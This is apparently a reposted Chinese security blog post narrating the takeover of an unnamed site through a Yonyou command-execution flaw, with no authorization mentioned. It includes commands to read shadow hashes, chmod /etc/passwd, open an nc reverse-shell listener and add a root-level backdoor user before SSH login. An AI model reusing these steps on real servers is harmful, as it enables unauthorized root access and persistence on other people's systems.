渗透测试 | 一次实战远程命令执行漏洞并提权

巡安似海 LemonSec 2024-04-27 10:27

前言

某站用友的命令执行漏洞，测试
print hello
发现可以执行命令

whami

和
id

都查一波权限，发现是
root
，
权限这么大，很好搞啊

ps -ef|grep sshd

查一波 发现可以ssh连接，直接u
seradd 
用户，但是整个shell无法给用户添加密码，无法远程登录，怎么搞，直接读
shadow

哈希，爆破密码

爆破无结果，头大，怎么搞，思考5分钟，可以直接写
passwd
啊，试一波

再次查看
shadow

居然没写进去，难道权限不对，
ls -alrt /etc/passwd
 发
现权限是544 ，直接
chmod 777 /etc/passwd

改权限，继续写，依然写不进去，换了各种姿势，都不行，难住我了，突然想起了nc反弹，一般linux都装有nc，这个有没有，查一波

果然不错，有
nc
，通过
dnslog
查一下是否有外连

能ping通，果然能外连，那就可以通过nc反弹搞一波了，本地的攻击机在内网，内网穿透一波

我一般用
https://www.uulap.com/

大家可以试试

将本地的
6666
端
口映射到公网

本地建立监听

nc -l -n -v -p 6666

让目标机进行
nc
反弹

果然反弹回来了，直接上命令，加用户

echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd

查看已经添加成功

直接ssh连接，发
现是阿里云的服务器

至此结束收工！

文章转自
巡安似海

侵权请私聊公众号删文

热文推荐****

• 蓝队应急响应姿势之Linux

• 通过DNSLOG回显验证漏洞

• 记一次服务器被种挖矿溯源

• 内网渗透初探 | 小白简单学习内网渗透

• 实战|通过恶意 pdf 执行 xss 漏洞

• 免杀技术有一套（免杀方法大集结）(Anti-AntiVirus)

• 内网渗透之内网信息查看常用命令

• 关于漏洞的基础知识

• 任意账号密码重置的6种方法

• 干货 | 横向移动与域控权限维持方法总汇

• 手把手教你Linux提权

欢迎关注LemonSec

觉得不错点个“赞”、“在看”